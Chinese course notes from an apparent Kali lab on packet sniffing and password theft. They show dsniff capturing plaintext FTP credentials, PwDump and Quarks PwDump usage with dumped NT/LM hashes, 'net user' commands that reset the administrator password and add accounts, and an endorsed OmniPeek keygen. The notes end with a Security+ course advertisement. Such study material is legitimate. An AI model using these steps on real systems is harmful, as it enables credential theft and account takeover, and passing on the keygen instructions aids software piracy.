【安全牛学习笔记】抓包嗅探

┃抓包嗅探

┃Windows

┃    Wireshark

┃    Omnipeek

┃    commview

┃    Sniffpass

┃Linux

┃    Tcpdump

┃    Wireshark

┃    Dsniff

选择一个好用的抓包软件很重要,OmniPeek不但具有信息包流的专家分析系统和应用分析,完整的七层协议解码,应用响应时间(ART)分析以及互式节点图等功能,同时还可以为您提供安全功能,与监控功能。有了OmniPeek,您就可以更好的进行抓包工作了

omnipeek 7.9.1是出自WildPackets的著名的抓包软件。其功能与Sniffer Pro有相似之处,但是经过多年的发展,其开发环境已经从VC++转移到了C#平台。

OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括基于信息包流的专家分析系统和应用分析,交互式节点图,完整的七层协议解码,应用响应时间(ART)分析,安全功能,监控与报表,RMON分布式分析!

monipeek注册机,已经测试过有的5.0、6.0、6.1、6.5、7.5的版本都可以注册,会被认为是病毒,这个不解释。

1、在Product的下拉框中选中OmniEngine Enterprise

2、Product Version中选择对应的版本,比如你是6.5的版本就输入65 是7.5的版本就输入75即可。

3、看上以上说明仍不会用的建议回炉重造

OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段。

OmniPeek同样有能力连接到远程运行多种应用的引擎。运行在Omni3 引擎上的首要应用是Peek DNX(Distributed Network eXpert分布式网络专家)。为了显示远程网段信息,OmniPeek从Peek DNX收集统计数据并进行相关分析。OmniPeek控制台的界面与操作方式都与EtherPeek NX相同:非常易于使用,诸如"选择相关数据包”等内嵌功能以及可客户化的界面。OmniPeek也用来配置远程引擎,包括过滤、报告、和专家系统等设置。只有在用户需要解码、分析或者本地保存数据包内容时,数据包文件才会被传送到OmniPeek。

[email protected]:~# service pure ftpd start

[email protected]:~# netstat -pantu | grep :21

tcp        0      0 0.0.0.0:21              0.0.0.0:*                  LISTEN

1466/pure-ftpd(SER

tcp        0      0 :::21                   :::*                       LISTEN

1466/pure-ftpd(SER

[email protected]:~# dsniff -h

Version: 2.4

Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]

[-f services] [-t trigger[,...]] [-r|-w savefile]

[expression]

[email protected]:~# dsniff -i eth0

dsniff: listening on eth0

-----------------

09/14/15 19:08:10 tcp localhost.61811 -> kali.21 (ftp)

USER anonymous

PASS [email protected]

-----------------

09/14/15 19:08:10 tcp localhost.61811 -> kali.21 (ftp)

USER anonymous

PASS [email protected]

-----------------

09/14/15 19:08:10 tcp localhost.61811 -> kali.21 (ftp)

USER yuanfh

PASS password

-----------------

09/14/15 19:08:10 tcp localhost.61811 -> kali.21 (ftp)

USER anonymous

PASS [email protected]

-----------------

09/14/15 19:08:10 tcp localhost.61811 -> kali.21 (ftp)

USER anonymous

PASS [email protected]

┃键盘记录

┃    Keylogger

┃    木马窃取



本地缓存密码

┃浏览器缓存的密码

┃    IE浏览器                 小心了!

┃    Firefox

┃网络密码

┃无线密码

┃http://www.nirsoft.net

┃Dump SAM

┃    Pwdump

┃    /usr/share/windows-binaries/fgdump/

[email protected]:~# cd /usr/share/windows-binaries/

[email protected]:/usr/share/windows-binaries# ls

backdoors    fport             nbtenum    radmin.exe     whoami.exe

enumplus     Hyperion-1.0.zip  nc.exe     sbd.exe

exe2bat.exe  klogger.exe       nc.txt     vncviewer.exe

fgdump       mbenum            plink.exe  wget.exe

[email protected]:/usr/share/windows-binaries# ls fgdump/

cachedump64.exe  fgdump.exe  pstgdump.exe  README        servpw.exe

cachedump.exe    fgexec.exe  PwDump.exe    servpw64.exe

[email protected]:/usr/share/windows-binaries# cp fgdump/ -R /media/sf_D_DRIVE/

-------------------------------------------------------------------------------

=========Quarks PwDump 是一个Win32环境下的系统授权信息导出工具,目前除此之外没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,且相当稳定。它目前可以导出 :- Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录 – Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录 – Cached domain password 缓存中的域管理密码 – Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢复后遗留的信息支持的操作系统 : XP/2003/Vista/7/2008/81 / USAGE

=========

Here it is how you can use Quarks PWDump:

quarks-pwdump.exe <option(s)> <NTDS file>

Options :

–dump-hash-local

–dump-hash-domain-cached

–dump-hash-domain (NTDS_FILE must be specified)

–dump-bitlocker (NTDS_FILE must be specified)

–with-history (optional)

–output-type JOHN/LC (optional, if no=>JOHN)

–output FILE (optional, if no=>stdout)

Dump options must be user all at once.

In all cases, the tool must be executed on the targeted operating system.

Some command examples:

- Dump domain hashes from NTDS.dit with its history

#quarks-pwdump.exe –dump-hash-domain –with-history

- Dump local account hashes to LC format

#quarks-pwdump.exe –dump-hash-local –output-type LC

- Dump domain hashes from NTDS.dit with its history

#quarks-pwdump.exe –dump-bitlocker –output c:\bitlocker.txt c:\ntds.dit

All features require administrator privileges.点击下载

-------------------------------------------------------------------------------

C:\Docouments and Settings\yuanfh>cd

C:>cd fgdump

C:\fgdump>PwDump.exe

dwdump6 Version 2.0.0-bate by fizzging and the nighty group at foofus.net

** THIS IS A BETA VERSION! YOU HAVE BEEN VARNED. **

Copyright 2009 foofus.net

This program is free software under th GNU

Ceneral Public License Version 2 <GNU CPL>, you can redistribute it and/or

nodify it under the terms of the GNU GPL, as published by the Free Software

Foundation. NO WARRANY,EXPRESSED OR IMPLIED, IS GRANIED WITH THIS

PROGRAM. Please see the COPYING file include wiht this program

and the GNU CPL,for furher details.

Usage:PwDump.exe [-x][-n][-h][-o output_file][-u user][-p password][-s share]nachineName

where -h prints this usage message and exits

where -o specifies a file to which to wirte the output

where -u specifies the user name used to connect to the target

where -p specifies the password used to connect to the target

where -s specifies the share to be used on the target, rather than searching for one

where -n skips password histories

where -x targets a 64-bit host

C:\fgdump>PwDump.exe localhost

dwdump6 Version 2.0.0-bate by fizzging and the nighty group at foofus.net

** THIS IS A BETA VERSION! YOU HAVE BEEN VARNED. **

Copyright 2009 foofus.net

This program is free software under th GNU

Ceneral Public License Version 2 <GNU CPL>, you can redistribute it and/or

nodify it under the terms of the GNU GPL, as published by the Free Software

Foundation. NO WARRANY,EXPRESSED OR IMPLIED, IS GRANIED WITH THIS

PROGRAM. Please see the COPYING file include wiht this program

and the GNU CPL,for furher details.

Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::

Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

HelpAssistant:1000:0DB09EBDOF38F482422299F81C49E52D:B132D26618FF9614E19C5E07C671D021:::

SUPPORT_3889450:1002:NO PASSWORD*********************:FD5162A2C2C85A976E9A482CD1ED440E:::

yuanfh:1003:NO PASSWORD*********************:NO PASSWORD*********************:::

Completed

C:\fgdump>net user yuanfh abc

C:\fgdump>net user administartor abc

C:\fgdump>net user a a /add

C:\fgdump>net user b b /add

[email protected]:/usr/share/windows-binaries# cp /media/sf_D_DRIVE/xp.pwdump.txt .

[email protected]:/usr/share/windows-binaries# ls

backdoors    fport             nbtenum    radmin.exe     whoami.exe

enumplus     Hyperion-1.0.zip  nc.exe     sbd.exe        xp.pwdump.txt

exe2bat.exe  klogger.exe       nc.txt     vncviewer.exe

fgdump       mbenum            plink.exe  wget.exe

[email protected]:/usr/share/windows-binaries# mv xp.pwdump.txt /root/xp.pwdump

[email protected]:/usr/share/windows-binaries# ls

backdoors    fport             nbtenum    radmin.exe     whoami.exe

enumplus     Hyperion-1.0.zip  nc.exe     sbd.exe

exe2bat.exe  klogger.exe       nc.txt     vncviewer.exe

fgdump       mbenum            plink.exe  wget.exe

[email protected]:/usr/share/windows-binaries# cd

[email protected]:~# ls

18411.c           exp       xp.pwdump  模板  图片  下载  桌面

dsniff.services   handle.txt  公共     视频  文档  音乐

[email protected]:~# cat xp.pwdump

ophcrack

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂


Security+认证为什么是互联网+时代最火爆的认证?


牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?

原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

原因二: IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

 近期,安全牛课堂在做此类线上培训,感兴趣可以了解

时间: 2024-10-01 19:28:56

【安全牛学习笔记】抓包嗅探的相关文章

【安全牛学习笔记】基本工具-WireShark

一.WireShark简介 抓包嗅探协议 安全专家必备的技能 WireShark使用的抓包引擎: Libpcap9---linux Winpcap10---Windows 解码能力 WireShark是最优秀的协议解码分析软件 二.WireShark的使用方法 1.点击菜单栏 捕获 (1)混杂模式 混杂模式能捕获局域网内所有发包内容,包括非广播包和非发给 自己主机的数据包,如果想要了解网络里所有的流量情况,需要 选择混杂模式 (2)捕获过滤器 网络里有大量的数据包在传输,会影响对网络协议的分析

小白日记22:kali渗透测试之提权(二)--抓包嗅探

抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议,并提取密码 Linux系统 1.Tcpdump 2.Wirehshark 3.Dsniff 类似Sniffpass,只抓取密码(明文协议),在kali下默认集成. 测试 打开ftp服务  #service pure-ftpd start 启动:dsniff -i eth0 在其他主机上连接ftp服务

python学习笔记-抓取网页图片脚本

初学者一枚,代码都是模仿网上的.亲测可用~ 运行脚本的前提是本机安装了httplib2模块 #!/usr/bin/python import os import re import string import urllib #author:reed #date:2014-05-14 def GetWebPictures(): url=raw_input('please input the website you want to download:') imgcontent=urllib.urlo

【安全牛学习笔记】TCPDUMP-抓包、筛选、高级筛选、过程文档记录

TCPDUMP No-GUI的抓包分析工具 Linux.Unix系统默认安装 TCPdump-----抓包 抓包 默认只抓68个字节 tcpdump -i eth0 -s 0 -w file.pcap tcpdump -i eth0 port 22 读取抓包文件 Tcpdump -r file.pcap 选项介绍 -A 以ASCII格式打印出所有分组,并将链路层的头最小化. -c 在收到指定的数量的分组后,tcpdump就会停止. -C 在将一个原始分组写入文件之前,检查文件当前的大小是否超过了

【安全牛学习笔记】基本工具-常见协议包、WIRESHARK-TCP

WIRESHARK-常见协议包 数据包的分层结构 arp icmp tcp-三次握手 udp dns http ftp 例:arp 第一层包的相关信息.多少帧,大小,传输时间等统计信息 第二层数据包的内容字段.首先是目标地址,源地址.上层协议类型.  占位地段 第三arp包头. 硬件地址类型1表示以太网    协议类型ip解析成arp地址  硬件地址长度   ip地址4字节32位   操作代码  arp包头内容包含发送端的mac和ip目标端的mac和ip 例:ssdp 第一层汇总信息 第二层二层

【安全牛学习笔记】密钥交换、AIRCRACK-NG基础、AIRODUMP-NG排错

密钥交换                                             无线网络设计用于一组无线设备通信 关联到同一AP的设备共享无线信道 单播.广播.组播 安全特性要求不同 单播通信需要单独密钥加密通信双方流量 pairwise key: 对偶密钥 (PTK) 组播通信需要信任域内所有成员共享的同一密钥 group key: 组密钥(GTK) PMK 安全上下的顶级密钥 MK进行TLS-PRF加密得出PMK-----PTK 基于服务密钥 由上层身份验证方法服务器生成

【安全牛学习笔记】

弱点扫描 ╋━━━━━━━━━━━━━━━━━━━━╋ ┃发现弱点                                ┃ ┃发现漏洞                                ┃ ┃  基于端口五福扫描结果版本信息(速度慢)┃ ┃  搜索已公开的漏洞数据库(数量大)      ┃ ┃  使用弱点扫描器实现漏洞管理            ┃ ╋━━━━━━━━━━━━━━━━━━━━╋ [email protected]:~# searchsploit Usage:

&#8203;【安全牛学习笔记】操作系统识别

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂 Security+认证为什么是互联网+时代最火爆的认证? 牛妹先给大家介绍一下Security+ Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA :是和CISSP.ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作. 通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应

【安全牛学习笔记】DNS信息收集-DIG

DNS信息收集-DIG ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋ ┃DNS信息收集------DIG                                                                                                          ┃ ┃  dig @8.8.8.8 www.sina.com.mx